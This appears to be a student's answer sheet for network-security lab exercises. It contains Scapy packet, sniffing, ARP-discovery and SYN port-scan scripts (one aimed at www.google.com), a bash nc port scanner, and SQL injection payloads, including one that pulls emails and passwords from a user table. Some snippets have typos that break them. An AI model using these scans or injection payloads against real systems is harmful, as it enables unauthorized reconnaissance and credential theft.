1b)
from scapy.all import * 
packet=IP()/TCP() 
e_pack=Ether()/packet 
e_pack.show()

2b)
from scapy.all import * 
packets=sniff(count=10) 
packets.summary() 
print(packets[0].show()) 
print(packets[1].show())

3a)
from scapy.all import * 

result,unanswered=traceroute(["www.example.com","www.google.com"],maxttl=20) 

result.show()


4a)

import scapy.all as scapy
request = scapy.ARP()
request.pdst = "172.29.240.1/28"

broadcast = scapy.Ether()
broadcast.dst = "ff:ff:ff:ff:ff:ff"

request_broadcast = broadcast / request

clients = scapy.srp(request_broadcast, timeout=2)[0]
for element in clients:
    print(element[1].psrc + " - " + element[1].hwsrc)



7a)
from scapy.all import * 
packet=IP(dst="172.29.240.1")/ICMP() 
send(packet)


8a) 
from scapy.all import *
target = "www.google.com"
for port in range(70, 85):
    packet = IP(dst=target) / TCP(dport=port, flags="S")m
    response = sr1(packet, timeout=1, verbose=0)
    if response:
        print("Port", port, "is open")


10a)
from scapy.all import *
def callback(packet):
    if packet.haslayer(ICMP):
        print("ICMP Packet Detected")
        packet.show()

sniff(filter="icmp", prn=callback, count=10)




11a)
import scapy.all as scapy
request = scapy.ARP()
request.pdst = "192.168.5.0/24"
broadcast = scapy.Ether()
broadcast.dst = "ff:ff:ff:ff:ff:ff"
request_broadcast = broadcast / request
clients = scapy.srp(request_broadcast, timeout=1)[0]
for element in clients:
    print(element[1].psrc + " - " + element[1].hwsrc)


12- a)
from scapy.all import * result,unanswered=traceroute(["www.example.com","www.google.com"],maxttl=20) 
result.show()

""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
1c)
#!/bin/bash
read -p "Enter the starting port number: " start_portr
read -p "Enter the ending port number: " end_port
for (( port=start_port; port<=end_port; port++ ))
do
        nc -zv localhost $port
done


save it as port_scan.sh
chmod +x port_scan.sh //changing permission
./port_scan.sh
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
6C)
xx' IN (itemnum,sdesc,ldesc) UNION SELECT email,passwd,123,123 FROM userdb LIMIT 2 --

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
7c)
x' union select count(itemnum),count(itemnum),count(itemnum),count(itemnum) from itemdb -- 

